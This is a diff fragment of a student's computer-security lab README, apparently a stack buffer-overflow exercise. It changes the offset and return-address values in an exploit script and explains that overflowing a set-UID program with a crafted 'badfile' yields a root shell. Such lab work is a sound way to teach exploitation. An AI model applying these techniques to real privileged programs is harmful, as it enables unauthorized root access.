Aptroide/Computer_Security/Lab7/README.md

 L = 4

 # Calculate the offset to place the return address right after the buffer (ebp - buffer + L)
-offset = 0xbfffeb38 - 0xbfffeacc + L # The size of the buffer in the vulnerable program
+offset = 0xffffcf08 - 0xffffce9c + L # The size of the buffer in the vulnerable program
 # Return address (buffer + offset + buffersize).
-ret = 0xbfffeacc + offset + 100
+ret = 0xffffce9c + offset + 100
 ```

 Finally running `/Lab7/exercise3/stack-L1` (the set-UID program) will give us the root shell  due to copying excess data from the `badfile` which causes buffer overflow.
 By doing so, we can redirect the program's execution flow to a location controlled by `badfile`,

 ![attacks](/Lab7/exercise3/img/2.png)

+## Exercise 4: Launching Attack on 32-bit Program (Level 2)